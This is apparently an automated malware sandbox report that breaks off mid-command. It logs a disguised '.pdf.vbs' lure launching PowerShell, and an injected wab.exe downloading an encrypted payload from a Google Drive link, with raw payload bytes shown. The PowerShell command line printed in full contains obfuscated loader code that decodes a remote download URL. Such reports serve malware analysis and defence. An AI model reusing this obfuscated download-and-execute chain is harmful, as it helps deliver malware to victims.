                                                                              2024-04-18 19:14:09 UTC1255INData Raw: 30 4d 70 6e 32 7a 42 61 32 64 58 6b 51 42 63 66 62 37 63 4e 47 64 47 64 70 52 63 4a 30 4c 49 41 79 30 6d 71 6b 62 71 73 61 75 79 67 39 55 6f 62 51 50 35 33 6b 4e 58 4c 30 46 6a 78 65 38 46 45 6b 54 61 47 71 4f 5a 51 4a 4a 63 72 76 5a 48 38 72 67 4d 62 7a 4f 79 6e 4c 6a 63 47 58 47 43 38 4f 62 37 57 71 47 32 4b 4b 48 6e 32 58 47 6d 53 4a 6d 6d 32 71 32 55 5a 57 4d 46 32 30 6d 37 46 4e 65 63 51 37 4c 51 55 42 2b 67 42 4a 6b 47 30 44 53 74 52 45 64 49 72 47 75 4b 32 44 75 59 78 79 39 36 5a 45 64 59 64 34 4b 50 63 38 6f 45 30 52 75 46 49 32 74 4e 50 77 34 2f 73 32 79 6d 64 61 37 75 4c 74 31 74 6f 76 66 63 43 53 48 61 6f 4e 32 73 4d 75 70 5a 64 75 65 59 30 77 36 61 70 74 44 6e 44 63 30 5a 63 4e 68 73 4c 38 73 75 75 31 74 30 4f 70 67 65 56 64 75 69 70 51 35 6e
                                                                              Data Ascii: 0Mpn2zBa2dXkQBcfb7cNGdGdpRcJ0LIAy0mqkbqsauyg9UobQP53kNXL0Fjxe8FEkTaGqOZQJJcrvZH8rgMbzOynLjcGXGC8Ob7WqG2KKHn2XGmSJmm2q2UZWMF20m7FNecQ7LQUB+gBJkG0DStREdIrGuK2DuYxy96ZEdYd4KPc8oE0RuFI2tNPw4/s2ymda7uLt1tovfcCSHaoN2sMupZdueY0w6aptDnDc0ZcNhsL8suu1t0OpgeVduipQ5n
                                                                              2024-04-18 19:14:09 UTC1255INData Raw: 7a 6a 31 59 70 69 76 54 64 54 73 77 30 51 70 5a 66 50 4f 45 71 73 36 61 70 76 39 31 39 50 43 74 76 33 4b 57 67 7a 77 34 61 4b 79 2b 69 79 2b 4d 67 53 63 52 63 66 53 6e 65 4b 4d 41 61 74 72 67 52 74 54 44 64 48 6b 66 37 35 39 49 58 6e 53 6c 73 55 4f 2b 6e 47 67 36 6e 48 6b 59 46 49 44 4b 72 35 74 38 43 55 45 35 59 2b 72 73 41 4c 32 4b 72 77 39 2b 50 32 48 77 37 34 63 4b 34 42 46 48 63 51 4e 69 41 6e 36 2b 77 6d 4a 33 4e 38 4f 76 62 68 57 63 65 59 78 36 79 64 61 41 2f 34 2f 33 4c 41 64 44 47 30 44 55 2f 41 69 42 58 30 4c 34 37 41 46 71 58 42 63 41 2f 41 4b 50 6c 33 35 65 37 6a 56 6a 44 4b 47 65 49 6b 6d 63 65 7a 33 68 39 63 4a 44 76 38 6e 38 42 64 68 50 6c 44 6a 6f 64 61 6c 6d 61 47 76 74 43 39 62 7a 34 73 2b 73 37 41 63 4b 45 54 4a 59 50 41 54 73 49 74 35
                                                                              Data Ascii: zj1YpivTdTsw0QpZfPOEqs6apv919PCtv3KWgzw4aKy+iy+MgScRcfSneKMAatrgRtTDdHkf759IXnSlsUO+nGg6nHkYFIDKr5t8CUE5Y+rsAL2Krw9+P2Hw74cK4BFHcQNiAn6+wmJ3N8OvbhWceYx6ydaA/4/3LAdDG0DU/AiBX0L47AFqXBcA/AKPl35e7jVjDKGeIkmcez3h9cJDv8n8BdhPlDjodalmaGvtC9bz4s+s7AcKETJYPATsIt5


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.549715173.194.219.1384435496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-04-18 19:14:47 UTC216OUTGET /uc?export=download&id=1w6J0xEPtolIyRbLIjhnxbM_QNNOpTZFW HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                              Host: drive.google.com
                                                                              Cache-Control: no-cache
                                                                              2024-04-18 19:14:47 UTC1582INHTTP/1.1 303 See Other
                                                                              Content-Type: application/binary
                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                              Pragma: no-cache
                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                              Date: Thu, 18 Apr 2024 19:14:47 GMT
                                                                              Location: https://drive.usercontent.google.com/download?id=1w6J0xEPtolIyRbLIjhnxbM_QNNOpTZFW&export=download
                                                                              Strict-Transport-Security: max-age=31536000
                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                              Content-Security-Policy: script-src 'nonce-MqD0lZW4t2QornR9tq9eZw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                              Server: ESF
                                                                              Content-Length: 0
                                                                              X-XSS-Protection: 0
                                                                              X-Frame-Options: SAMEORIGIN
                                                                              X-Content-Type-Options: nosniff
                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                              Connection: close


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              3192.168.2.549716173.194.219.1324435496C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-04-18 19:14:47 UTC258OUTGET /download?id=1w6J0xEPtolIyRbLIjhnxbM_QNNOpTZFW&export=download HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                              Cache-Control: no-cache
                                                                              Host: drive.usercontent.google.com
                                                                              Connection: Keep-Alive
                                                                              2024-04-18 19:14:48 UTC4753INHTTP/1.1 200 OK
                                                                              Content-Type: application/octet-stream
                                                                              Content-Security-Policy: sandbox
                                                                              Content-Security-Policy: default-src 'none'
                                                                              Content-Security-Policy: frame-ancestors 'none'
                                                                              X-Content-Security-Policy: sandbox
                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                              Cross-Origin-Embedder-Policy: require-corp
                                                                              Cross-Origin-Resource-Policy: same-site
                                                                              X-Content-Type-Options: nosniff
                                                                              Content-Disposition: attachment; filename="eouLFzIrI0.bin"
                                                                              Access-Control-Allow-Origin: *
                                                                              Access-Control-Allow-Credentials: false
                                                                              Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt
                                                                              Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                              Accept-Ranges: bytes
                                                                              Content-Length: 106560
                                                                              Last-Modified: Mon, 15 Apr 2024 21:14:28 GMT
                                                                              X-GUploader-UploadID: ABPtcPrZ4K1rXNNeEzS1ABj-b8S3FGdEM9wb9pyd5e2Hb2YSVZXXSzXQOLeFFCuzIicuRgCsk0CTSMJ20g
                                                                              Date: Thu, 18 Apr 2024 19:14:48 GMT
                                                                              Expires: Thu, 18 Apr 2024 19:14:48 GMT
                                                                              Cache-Control: private, max-age=0
                                                                              X-Goog-Hash: crc32c=DdKQiQ==
                                                                              Server: UploadServer
                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                              Connection: close
                                                                              2024-04-18 19:14:48 UTC4753INData Raw: 7b 31 f4 0d 95 cb 34 87 db 64 d5 ea 0b 89 8d df 04 0c af c8 84 ec be d2 ea ad 4c 1d b2 20 3a 22 87 7d 40 4d 0a b7 ce e5 f7 8d 3f 8f 27 ad 53 19 13 44 d7 bb 27 d8 d5 aa d3 51 b0 c5 fb 75 6d a5 f3 91 2f d3 cc 58 44 49 3c da 57 3b e8 37 92 c4 93 62 f5 fd 60 f8 4b 25 a8 19 a3 7a b0 9b b7 17 19 b4 20 47 0a b6 75 6d 7c c6 60 a7 ab 56 b9 1e 4b ca ea 0b 73 00 a1 05 69 c3 bc 1d 21 e8 9a 40 af 4a c3 9d 0f 42 30 b4 f4 7d 42 e9 35 79 2a 71 0b b9 7f da a0 c0 de 06 bd a1 8b c4 e4 b6 bb ec ed 98 ba fa 1e 07 a8 9b 9e b5 ad e0 e3 eb ef 64 68 61 2e bc 42 26 07 49 64 d6 36 38 4e 7b 64 c8 ec 58 d5 cb 23 e4 c3 c8 de 15 55 84 3e 2d 80 8a 26 f0 f3 a7 52 d5 1c 6e b6 4f 32 95 05 84 5e fa c9 1e bc 5a e2 af 21 ad cd 18 73 19 98 ce 82 aa 02 20 c9 cf f8 e6 bb f2 49 38 2d 5c 5d 89 6a
                                                                              Data Ascii: {14dL :"}@M?'SD'Qum/XDI<W;7b`K%z Gum|`VKsi!@JB0}B5y*qdha.B&Id68N{dX#U>-&RnO2^Z!s I8-\]j
                                                                              2024-04-18 19:14:48 UTC4753INData Raw: 21 dd 29 f5 c7 a0 eb 7c f8 c8 c7 8f 10 12 cd 83 7e 16 dc 13 1e e5 02 a2 90 b0 ef 6c 42 d8 a8 be 10 50 27 90 9a ab 32 a9 b5 74 da a7 16 3d 12 33 40 0e 49 41 e7 b1 79 36 39 bc 9d 29 ca 80 05 8f 9d 63 b9 af 4a 79 6c 0f 14 d8 1c c2 33 81 1d 7c 25 68 0e c1 5f a4 d8 ed 16 5a 67 1c 68 80 77 48 9d d7 fa 39 65 81 96 b2 b0 c1 5b f8 a8 55 7e 1b 19 06 bd df 37 a3 d9 36 48 fb b6 84 98 b3 26 4c 46 9c aa 0f ae 6e 98 99 f7 4a 6b 6f df 80 77 a4 a5 8c 72 79 56 33 0d d8 c2 38 a1 37 d4 fe cf 5b 1f 49 db 75 0a 19 b2 ae 71 5d da 80 b3 b5 4b d4 b2 7f 53 6e 29 91 48 3d 02 9b 7e 63 2f 18 85 7d 56 cf 56 bd 0a 50 8d e3 a3 b5 d1 2f 6d 7f 28 a3 d4 16 44 33 b0 5b 85 3e 12 b6 36 73 78 d9 52 72 ce 5b f4 db 91 5b 16 ae 21 c9 62 d8 0c 59 be 02 da 5c a5 7d 80 b8 29 43 fb d2 25 b2 5b 40 94
                                                                              Data Ascii: !)|~lBP'2t=3@IAy69)cJyl3|%h_ZghwH9e[U~76H&LFnJkowryV387[Iuq]KSn)H=~c/}VVP/m(D3[>6sxRr[[!bY\})C%[@
                                                                              2024-04-18 19:14:48 UTC441INData Raw: 45 2a 6e 2f b1 71 c9 16 4b ba 77 1c 1d d3 2d 19 db 82 ad 71 f5 68 40 23 b5 cc 49 87 2d 14 fe 87 ed 74 77 25 d9 08 f0 57 c6 ff 6c 66 d1 38 d1 e2 1f c2 f3 48 ba af 3f 5e 58 a5 93 b1 b2 53 84 6b 6b 8e bb b7 cd 5b cf 31 44 0a f2 44 bb 57 7c 8b da 62 cd 82 cc 71 22 1f e9 7a 25 f7 23 74 e7 00 96 fd ec 5f c5 ce dd f8 38 21 b2 3a a8 83 13 0d 79 b3 a7 ee 49 b2 b3 bc e2 72 2e 81 66 6a 4c c3 ad da a1 09 60 4e aa 1c 77 48 a8 c6 10 b2 be 3c 53 49 0a e4 fc 2c d1 a2 6a 82 3b c3 24 6f 0b 91 fd 04 e3 2c 35 a5 b8 74 3e ae f9 4a b5 1b 47 d9 4f 0d dd 39 0e 35 af 9c 8a e0 9b 26 d2 a2 0e db d3 e5 38 61 3b ef 4a ea 64 f9 93 9b 18 be 99 79 de e6 b2 fb f3 1a d1 51 f7 28 5b 90 b8 cf 0f 53 51 49 56 70 69 0f 55 fa af a8 57 d3 f7 52 4e ef 92 98 33 93 b2 8c 4b 07 c7 f3 2e 58 c5 a2 75
                                                                              Data Ascii: E*n/qKw-qh@#I-tw%Wlf8H?^XSkk[1DDW|bq"z%#t_8!:yIr.fjL`NwH<SI,j;$o,5t>JGO95&8a;JdyQ([SQIVpiUWRN3K.Xu
                                                                              2024-04-18 19:14:48 UTC1255INData Raw: 67 e9 6c 65 36 25 ff 4f 10 7b 49 66 b6 73 83 df a1 3d 6b 61 c1 24 f6 ce 92 d6 17 b5 77 87 03 b4 53 05 48 7d b4 8e f5 c2 41 65 44 5e 12 7c 54 5f b3 6c 60 30 f8 d2 74 f0 fd 84 38 30 f3 65 91 6b 60 3f cc d0 d8 26 cc 13 15 35 ce a5 17 65 a1 94 e0 e7 1e cf eb 3d 2f 1c 82 79 ce 6b 9c 57 d5 99 19 2f a3 59 a0 f2 b8 c6 8d e6 53 a4 5e a7 63 a3 cf 61 03 2d a0 c6 d7 61 03 48 6d cf ba c4 bd 14 56 0f c6 db f0 65 81 85 82 6e cd 78 0f 6a ee 9a 12 cc 75 08 94 2f eb 0e a6 89 d1 20 ee 81 ef 65 0d 0f 44 d7 b0 11 02 62 91 31 16 b4 8d 62 a9 02 ef d4 f9 c2 8c fb 2a c2 ef 5e 22 0d d6 86 85 f8 0e 00 17 c8 90 b9 a6 91 01 85 d4 00 69 dc 22 ae b2 7a 10 70 a2 85 ce 86 96 bd 8d e5 61 4b aa 50 9d 0c ff d7 0c 01 12 ed 5d 27 c8 15 3a b6 35 e0 c1 1c 0f b6 f6 93 e5 a5 f9 90 94 06 de 83 8b
                                                                              Data Ascii: gle6%O{Ifs=ka$wSH}AeD^|T_l`0t80ek`?&5e=/ykW/YS^ca-aHmVenxju/ eDb1b*^"i"zpaKP]':5
                                                                              2024-04-18 19:14:48 UTC1255INData Raw: f8 3e 51 50 e8 04 80 08 9b 56 5b fa 96 90 ef 90 9c 14 cb 17 cb 54 2f 6c 7a fe c6 a9 8e 40 83 d1 f4 d3 33 15 e9 8f a3 23 d3 24 7e 9f d5 9b 43 51 76 27 2a da aa 78 87 c1 b5 90 80 36 eb 57 2f 43 4b b4 37 01 0d 58 1d ea 93 a2 4f b7 cb 93 3a 6f 19 13 1f f7 ad 77 c7 36 22 0d 25 8d 55 43 bc d6 3b cc 6e 76 cd 25 31 5d 8c 2e 87 8e 0d bd 86 e8 0a e8 3c 12 cf fb 5d 74 ab 01 67 e8 8a d9 7f 4b 98 92 cd 82 7c f8 f6 e9 39 b2 2e 9e ca bd f9 a7 3c 12 8f 4f 18 41 a6 e4 ad 0a ae 3b 30 df 07 f6 9c bc c0 3c 3d 4e 63 c2 0d 04 cd ff da b8 c5 6f df 0f 33 66 67 9e 17 88 9b d6 3d 75 83 6b b3 b5 e2 a1 ff 99 e6 e2 67 6a 9f 69 ce a5 4f 83 57 10 53 2e 2f e8 fc cb 94 99 ee 5a 58 b5 21 44 de 75 bc cf 23 54 e3 fe 5f f5 13 d8 6a c5 52 d9 61 1e aa 0e f7 60 3c ba ae 46 54 99 ae b1 9c 4e 74
                                                                              Data Ascii: >QPV[T/lz@3#$~CQv'*x6W/CK7XO:ow6"%UC;nv%1].<]tgK|9.<OA;0<=Nco3fg=ukgjiOWS./ZX!Du#T_jRa`<FTNt
                                                                              2024-04-18 19:14:48 UTC1255INData Raw: ec f3 2c f9 0e 25 a3 53 94 b9 bf 62 25 18 33 a6 a7 1d 61 1a 28 6b 5c f1 1f a8 29 f1 d7 08 1a 6a 66 ac 68 21 2f 6c 29 ed 42 bf 89 47 16 fe c3 bf 50 44 8a f4 87 86 2f af 40 29 11 7d ed da 1d 38 76 97 08 70 e7 8b 7f bb dc 46 c9 cd bb 9b db c5 3f 53 7d 9e e3 7c 95 3d 40 05 f9 59 cf 20 76 a9 26 74 13 85 54 60 51 d8 52 f7 28 33 42 f0 d6 fc 76 1e c8 ae 46 fb 98 43 04 68 d9 87 bc 02 85 58 6e 6c 48 67 b0 f4 10 7b 66 25 df c6 b5 b4 82 bc ca 5b 53 ea 46 24 f7 95 53 14 9e 7c 06 23 5d a7 26 db 7a 89 34 c2 39 af a3 8a 2e 1a 06 08 55 87 36 0d ac 9a 9e 30 bf e1 8a f0 61 c1 b5 42 ec 9c b6 f7 15 d9 a0 b2 a4 15 40 a8 1c 0e 99 15 0b fb 2e 85 15 f1 0d ef 8d fd 87 6a 73 62 db b0 3e cd ec fa 08 ea f2 bc 97 f3 0c 41 a1 e1 84 31 76 08 17 a1 60 bf 4d 94 23 63 c4 7f a4 5f 51 aa 72
                                                                              Data Ascii: ,%Sb%3a(k\)jfh!/l)BGPD/@)}8vpF?S}|=@Y v&tT`QR(3BvFChXnlHg{f%[SF$S|#]&z49.U60aB@.jsb>A1v`M#c_Qr
                                                                              2024-04-18 19:14:48 UTC1255INData Raw: 9b cb 11 c8 cf 72 15 db c3 b9 65 8e 44 ab 7e 80 75 cd d8 a1 1e ea db f2 8e bd 19 4a 36 30 2f ae 24 68 57 4e 53 50 34 dd 29 f8 92 86 0f d9 89 33 aa cf ca 2b 8c 65 ff 38 be 31 21 6b a2 67 d9 2e f9 ea 0f b1 d3 d4 8d 05 70 17 ef d4 1e d1 00 43 06 93 d8 02 9d 5e 7a a5 9d 33 d0 64 1e 63 dc a6 60 87 9b 8f c0 16 f0 9b 50 47 27 42 7c 57 10 1c 4a db ed f9 fe 63 7c 36 8e e5 01 4a 45 4d 2b 62 99 9a 75 4c b7 8f bd 74 dd 26 29 28 85 2d 18 03 04 b6 1e 8d a4 42 e6 8d 5c ea 2d fc 44 94 bf a4 9a 7e 5c 13 7a 5d 27 18 ab 47 5f a0 f9 54 e2 2f f1 f0 9b 59 70 d8 a0 66 72 64 04 c1 48 fe e7 be 91 79 ca a6 b4 9d c2 f1 7f 19 6a d8 a8 49 6a 6c 74 d7 5a a8 1e ef 6c d0 73 86 87 a4 0e 2e cf b3 c3 5a a9 43 55 e9 16 e3 31 0a bd 74 8c ab 59 9a e6 91 c6 a5 a3 a7 15 cc 1d 4e a3 68 17 33 9e
                                                                              Data Ascii: reD~uJ60/$hWNSP4)3+e81!kg.pC^z3dc`PG'B|WJc|6JEM+buLt&)(-B\-D~\z]'G_T/YpfrdHyjIjltZls.ZCU1tYNh3
                                                                              2024-04-18 19:14:48 UTC1255INData Raw: cf 40 02 c0 84 67 12 77 57 36 d5 71 d3 9f 48 a4 97 7e ce f0 f6 fe c3 39 56 96 3a af 35 8f c4 9e 53 bc 74 36 62 c9 96 13 17 ad 04 06 d3 70 d7 22 4b c9 f3 41 a6 94 76 3f ff 20 a1 c5 44 98 87 c9 c4 df 07 33 34 47 bc fb 09 a0 0e 7a 1b 00 73 94 ea 0c 41 2c 76 56 17 52 5d d8 d7 0b 7c 6b 15 4a 10 8b 6b 5e 68 79 6b 8a 9e 59 7e 5a 78 76 49 39 d8 58 08 23 bd fc 10 ab c2 ec 0b a9 17 49 f4 f4 75 65 58 94 4c 1c cb 12 ad 45 2a 12 a8 49 f4 0c 9b 00 b6 3f f2 98 94 73 b5 0c 45 d9 dc 21 b4 34 09 38 a7 d4 a6 f2 2e 23 47 22 76 fc 15 b1 7e f7 14 3b 68 d3 e0 de eb 6c 94 19 b1 ff c3 f6 b6 a1 af b4 fd 0a d5 3b ce 34 b2 a4 93 5e 1f d3 11 b5 ae 8a 51 21 cc a2 21 4d 62 48 a4 f5 6f 39 8f 84 a4 cf a3 7f 87 96 27 fc d0 12 3c a7 64 4f f3 3e 30 cb 8a c1 d5 37 54 8f 5c 2b 31 4a 44 4c 68
                                                                              Data Ascii: @gwW6qH~9V:5St6bp"KAv? D34GzsA,vVR]|kJk^hykY~ZxvI9X#IueXLE*I?sE!48.#G"v~;hl;4^Q!!MbHo9'<dO>07T\+1JDLh
                                                                              2024-04-18 19:14:48 UTC1255INData Raw: a2 87 20 b3 6a d1 aa 98 9b bb db be d5 d7 cb 29 76 aa 17 92 9b 4e 0a d4 b6 ba 29 51 fe b3 01 4d 3b 2b c8 51 52 cf e5 bc 9c 56 4d d2 15 e4 00 98 f8 d3 8e 77 bf 4d 6b fb e7 1f 26 d4 b0 d2 13 a9 98 33 b3 f0 de 2f 15 d7 c8 b3 2b bb ba ca 2f b3 15 b9 24 41 95 79 43 ea ec 57 08 5f d3 35 db 56 7e be bb c1 c7 38 79 39 db 12 e6 fd 6c 72 50 b0 59 23 f6 4d 1e ff 63 5a a4 30 f8 65 c3 b6 f3 05 d9 a0 68 3f 9c c6 1f 17 58 24 ef 09 87 3d d0 c8 de f5 e9 e5 80 eb 72 48 61 06 34 90 d0 27 c5 9d 17 2e 42 87 85 3c bd a1 a5 9c 31 76 dc d9 a1 ce 46 09 c0 62 9a 8c b8 35 49 f3 1c 4d 9c cd a8 02 05 ba d3 99 c8 1f 23 90 3b 6e 33 20 86 09 31 ce 50 2b 44 47 57 50 00 c9 3a 66 8c bc 86 11 0b e1 f0 a3 69 8f 05 a6 0c eb b5 e6 e8 dd e1 a0 58 13 9d d4 1c 3f 41 9a e6 c4 c7 de 0a a1 59 2d 02
                                                                              Data Ascii: j)vN)QM;+QRVMwMk&3/+/$AyCW_5V~8y9lrPY#McZ0eh?X$=rHa4'.B<1vFb5IM#;n3 1P+DGWP:fiX?AY-
                                                                              2024-04-18 19:14:48 UTC1255INData Raw: 52 81 f7 17 90 67 46 85 3e be c3 67 bf 8d 6b d0 8b 81 52 84 5c 00 79 d7 73 db 68 34 00 11 35 74 8f c0 16 fc 5a 17 a6 31 24 3b 98 59 36 e8 00 5f 4c ce c8 08 25 53 3b 78 c9 e2 ac 67 c8 26 76 7c a4 db ff ba 00 1b ee 53 7d e4 df 7c ba f8 bf 7d 18 4c e2 b3 8d fd 79 42 6c 02 2e 48 70 5c 06 3c 6e 9b 91 ed e1 d2 84 34 21 be 31 89 c4 05 23 83 36 75 bb 08 0c 61 83 d9 7b 2d 75 cb 34 ae 86 ac 7f 78 04 75 90 ec 1b c3 71 4b 13 31 f0 30 77 bd 92 31 10 93 5d 6d fd 8b 25 70 4b c9 8f 91 56 75 d6 f4 f4 6c 7f 0f 88 6c 80 94 7f 71 29 08 91 4c d2 2e a4 ec b8 1a 32 b3 64 ff 85 e2 6c 98 04 f9 cd f6 3c 59 fc eb 62 77 74 8d 05 86 ee d2 22 40 45 98 e1 2e 9a df 27 2e cb a4 b9 dd 61 61 33 3c 4b 85 63 2e c3 c2 fb 51 b6 dd 9c 15 44 66 62 95 ff ce 71 23 c4 de 07 8f 0f bc 5e 64 71 ef 84
                                                                              Data Ascii: RgF>gkR\ysh45tZ1$;Y6_L%S;xg&v|S}|}LyBl.Hp\<n4!1#6ua{-u4xuqK10w1]m%pKVullq)L.2dl<Ybwt"@E.'.aa3<Kc.QDfbq#^dq


                                                                              Click to jump to process

                                                                              Click to jump to process

                                                                              Click to dive into process behavior distribution

                                                                              Click to jump to process

                                                                              Target ID:1
                                                                              Start time:21:13:59
                                                                              Start date:18/04/2024
                                                                              Path:C:\Windows\System32\wscript.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Request for Proposal Quote_2414976#U00b7pdf.vbs"
                                                                              Imagebase:0x7ff6a9c90000
                                                                              File size:170'496 bytes
                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:2
                                                                              Start time:21:14:03
                                                                              Start date:18/04/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Superexcrescence = 1;$Necroscopic18='Substrin';$Necroscopic18+='g';Function Refrig213($Kllert){$Ecstasy=$Kllert.Length-$Superexcrescence;For($Odeum119=7; $Odeum119 -lt $Ecstasy; $Odeum119+=(8)){$Gumminess+=$Kllert.$Necroscopic18.Invoke($Odeum119, $Superexcrescence);}$Gumminess;}function Medicinmands($Allodiaries){.($Deviascope) ($Allodiaries);}$Styggeres=Refrig213 ' GglendMCondensoRugekaszForkldniP okonsl Fe tivl MinimuaBasioph/ Skopu,5Protoc .Si,vanu0Oilwell Oversu (arkitekWPincushiMultiman BordindProgramo.endarmwLitesbes Trolje BogtilNAa.nersT Disput Insta.1Thegidd0typhloe.Luftrum0.onglet;Manipul firmaaWOrderleioutpuncnUn.idyu6 Procta4Anguish; A.tito Haandstx S heno6Finvask4Alle dy;Sidevae ParamyorPhrensivTransfo:melania1Dejeune2Curatis1,efrica.Organ.s0Jeanell)Townsid GrundliGD rklore WillsecForfaldkKejsereomaledi /Syresub2 Stjfor0 ueform1Tricaud0Paakal,0Mesmeri1Miljmyn0S uporh1Bagsder PseudofFFalangiiDaleswor Folkete etakinfPa,tagnoLeukocixSmearin/Partic 1Feudals2Skildre1Frdiggr. Bredba0Uforsta ';$Unpsychologically253=Refrig213 'OvereksU InvestsArticuleBaker.trDatasty-.edgrelASpulziegAnilinfeFemogtynEpithemtDet,nat ';$Cereals148=Refrig213 'JomfruthTippie,tFa,iaditIndolsspNiveauosSeriepr:Saetn n/Su.erbi/Deko.atd slitlirJulerosiGypterev SecreteAssis,e..entralgForkvi oSv,desto Buntmag Defilal VerdeneMesmeri.NringsvcIsoca,poWh.tewamHovedpr/ .ovorduPar,gracSqueaks?gravigreCobaltix ,trygepTrsteproUn ullerSomiklet 